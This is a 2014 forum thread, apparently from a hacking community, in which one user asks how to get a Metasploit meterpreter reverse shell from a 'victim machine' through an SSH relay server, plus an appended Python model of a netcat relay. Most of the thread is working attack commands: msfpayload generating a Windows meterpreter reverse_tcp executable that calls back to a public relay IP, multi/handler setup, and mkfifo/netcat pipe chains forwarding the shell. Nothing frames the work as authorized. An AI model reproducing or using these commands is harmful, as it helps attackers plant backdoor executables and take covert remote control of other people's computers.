Darkrising, posted June 3, 2014

Hello, I have a 3G connection which I'm unable to open ports for, so I'm using a remote server which is accessible from the internet. I'm using Kali on my local computer and Ubuntu for the server. Using the command:

    ssh -R *:44444:localhost:44444 root@<the remote server>

and setting GatewayPorts clientspecified in the sshd config, I've port forwarded port 44444 to my local Kali machine. I then set up a reverse tcp handler running on 44444 with LHOST as 127.0.0.1. Lastly I made an evil.exe and sent and ran it on the victim machine. However, when I look at Kali I see

    [*] Sending stage (770048 bytes) to 127.0.0.1

but no meterpreter shell is run. Am I doing something wrong?
i8igmac, posted June 3, 2014

Do you have access to netcat? Ruby, Python, Perl? You should check out mkfifo pipes. I can help, with an answer to my above question.
Darkrising, posted June 4, 2014 (author)

> Do you have access to netcat? Ruby, Python, Perl? You should check out mkfifo pipes. I can help, with an answer to my above question.

Yes, I do have access to them all.
i8igmac, posted June 4, 2014 (edited)

    $ mkfifo mypipe
    $ nc -l 8082 0<mypipe | nc yahoo.com 80 1>mypipe

Your netcat syntax may be different. Here is what mine looks like:

    nc -l -p 8082

This is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper Yahoo GET request. If this is simple enough we can move on to a reverse proxy.

Edited June 4, 2014 by i8igmac
Darkrising, posted June 4, 2014 (author, edited)

>     $ mkfifo mypipe
>     $ nc -l 8082 0<mypipe | nc yahoo.com 80 1>mypipe
>
> Your netcat syntax may be different. Here is what mine looks like: nc -l -p 8082. This is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper Yahoo GET request. If this is simple enough we can move on to a reverse proxy.

I understand, I've played with netcat before. Should I be using netcat to proxy over the ssh tunnel?

Edit: I've been looking at what this person has done here: https://bechtsoudis.com/hacking/using-ssh-socks-proxies-with-msf-reverse-tcp-payloads/ However, my Kali just freezes on sending stage...

Edited June 4, 2014 by Darkrising
i8igmac, posted June 4, 2014 (edited)

Try another payload, without the stage. There are 3 machines involved with your project? Kali--->SSH-BOX<---victim? Your ssh-box is the only machine that can port forward? I suggest running a small test. With netcat you can perform hello world examples.

Also, the link you provided: scroll down and you will see a netcat example like mine...

Edited June 4, 2014 by i8igmac
Darkrising, posted June 4, 2014 (author)

> Try another payload, without the stage. There are 3 machines involved with your project? Kali--->SSH-BOX<---victim? Your ssh-box is the only machine that can port forward? I suggest running a small test. With netcat you can perform hello world examples.

Yeah, that's correct. Kali is behind a gateway which can't have any ports opened, so the ssh box is the only machine which can port forward; the victim would connect through the ssh box, which would port forward over ssh to the Kali box. I have run a few netcat tests which work correctly. It seems metasploit on Kali just locks up when a victim connects on sending stage; if I try to interact with the session metasploit just locks up completely. I have also tried a reverse_http but it just times out before meterpreter can open.
i8igmac, posted June 4, 2014

Also, in the link you provided there is an update at the bottom of the page, a netcat example like the one I provided... If your machines are talking to each other then it may just be a metasploit issue.
Darkrising, posted June 4, 2014 (author)

I just tried making a new evil.exe and this time when I try to interact with the session I'm getting the error:

    Session manipulation failed: Validation failed: Address is reserved

I Googled the error and came across this page: https://community.rapid7.com/thread/2046 It seems metasploit just doesn't like being tunnelled. I have tried the VPN idea using pptpd but I ran into issues with ARP not being on the right subnet.
i8igmac, posted June 4, 2014

http://youtu.be/UkRpOlGS4ew

I may have come across this. I was successful in getting a reverse shell through a tunnel. In the video above I accomplished exactly what you are trying to do... BUT I tunneled the traffic through my android phone. I had to explore other types of tunnels; I made my own tunnel out of ruby sockets in this video, but I found netcat is simplest! Try something generic, a reverse shell... no staging or anything.
Darkrising, posted June 4, 2014 (author, edited)

> http://youtu.be/UkRpOlGS4ew
>
> I may have come across this. I was successful in getting a reverse shell through a tunnel. In the video above I accomplished exactly what you are trying to do... BUT I tunneled the traffic through my android phone. I had to explore other types of tunnels; I made my own tunnel out of ruby sockets in this video, but I found netcat is simplest! Try something generic, a reverse shell... no staging or anything.

Okay, sounds like a plan. I'll try experimenting with different tunnels and see what I can come up with :)

Edited June 4, 2014 by Darkrising
i8igmac, posted June 4, 2014 (edited)

So, if this makes sense... what I remember doing... on a droid at the moment... To bypass the problem you experience with metasploit, I had to set up a proxy on the Kali localhost, so that you would set LHOST/PORT of your multi/handler to localhost.

Kali:

    msfpayload reverse/payload set LPORT=1234 LHOST=ssh-box -x test.exe
    use multi/handler
    set LHOST localhost
    set LPORT 4444

Now start a netcat proxy with mkfifo to pass the payload to your ssh-box (improper syntax):

    nc -l -p 4444 0< pipe | nc ssh-box 5555 1> pipe
    exploit

Now your ssh-box needs to accept this and pass it to the victim; notice 2 ports need forwarding.

ssh-box:

    nc -l -p 5555 0< pipe | nc -l -p 1234 1> pipe

Now your victim executes the exe that connects back to ssh-box:1234... It's a brain twister of ports and pipes. Wish I was at my computer for a proper example.

Edited June 4, 2014 by i8igmac
i8igmac, posted June 4, 2014

Ok, I'm at my machine, this should work...

    kali_local-ip=192.168.70.103
    ssh-box_ip=66.66.66.66   # public ip

Ports 666 and 555 need to be forwarded on your ssh-box.

ssh-box:

    mkfifo ssh-box
    nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box

Kali: from Kali, generate the payload and set up the handler... transfer your payload to the victim... start some nc pipes.

    msfpayload windows/meterpreter/reverse_tcp LHOST=[ssh-box_ip] LPORT=666 X > test.exe
    msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=[kali_local-ip] lport=444 E

    # new terminal
    mkfifo kali
    nc [kali_local-ip] 444 0<kali | nc [ssh-box_ip] 555 1>kali

Now when the victim executes test.exe it will connect back to the ssh-box on port 666.
Darkrising, posted September 7, 2014 (author, edited)

> -Snip-

Hello, it's been a while since I've been messing with this stuff. I tried out your commands and got it to work over my LAN; however, when I try over the internet it fails. When you say forward, is that local or remote with ssh? Or do I have to do something else? Also, would you be able to explain the nc commands? My understanding of netcat is a little limited, specifically 0<kali 1>kali, moving in and out of the pipe I guess? Thanks.

Edit: I can't get this to work at all over the internet.

Edited September 8, 2014 by Darkrising
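To make the plumbing in i8igmac's `nc -l -p 555 0<ssh-box | nc -l -p 666 1>ssh-box` line concrete (the `0<` / `1>` question Darkrising asks above), here is an added Python model of the same double-listener relay; it is not code from the thread, it uses loopback sockets with OS-chosen ports so it runs anywhere, and the `relay_once`/`start_relay`/`exchange` names and the sample bytes are mine.

```python
import socket
import threading


def _pump(src, dst):
    # One direction of the splice: in the nc version `0<fifo` / `1>fifo`
    # wire the fifo as one path, the `|` between the two nc's is the other.
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_once(side_a, side_b):
    """Accept one connection per listener and splice them both ways,
    like `nc -l -p 555 0<fifo | nc -l -p 666 1>fifo` on the ssh-box."""
    conn_a, _ = side_a.accept()  # handler-side hop ("555")
    conn_b, _ = side_b.accept()  # peer-side hop ("666")
    threading.Thread(target=_pump, args=(conn_a, conn_b)).start()
    threading.Thread(target=_pump, args=(conn_b, conn_a)).start()


def start_relay():
    """Bind two loopback listeners (port 0: the OS picks a free port) and
    run relay_once in the background. Returns (port_a, port_b)."""
    listeners = []
    for _ in range(2):
        s = socket.socket()
        s.bind(("127.0.0.1", 0))
        s.listen(1)
        listeners.append(s)
    threading.Thread(target=relay_once, args=tuple(listeners),
                     daemon=True).start()
    return listeners[0].getsockname()[1], listeners[1].getsockname()[1]


def exchange(port_a, port_b, msg_a=b"hello via A", msg_b=b"reply via B"):
    """Connect to both ends with constructed sample bytes; returns what each
    side received, showing the splice carries traffic both ways."""
    a = socket.create_connection(("127.0.0.1", port_a))
    b = socket.create_connection(("127.0.0.1", port_b))
    a.sendall(msg_a)
    got_b = b.recv(4096)  # bytes entered on A come out on B
    b.sendall(msg_b)
    got_a = a.recv(4096)  # and the reverse path works too
    a.close(); b.close()
    return got_b, got_a
```

On the relay host this pattern is visible as two listening sockets plus one matched pair of established connections, which is the footprint an administrator reviewing `ss -tnp` on the ssh-box would see.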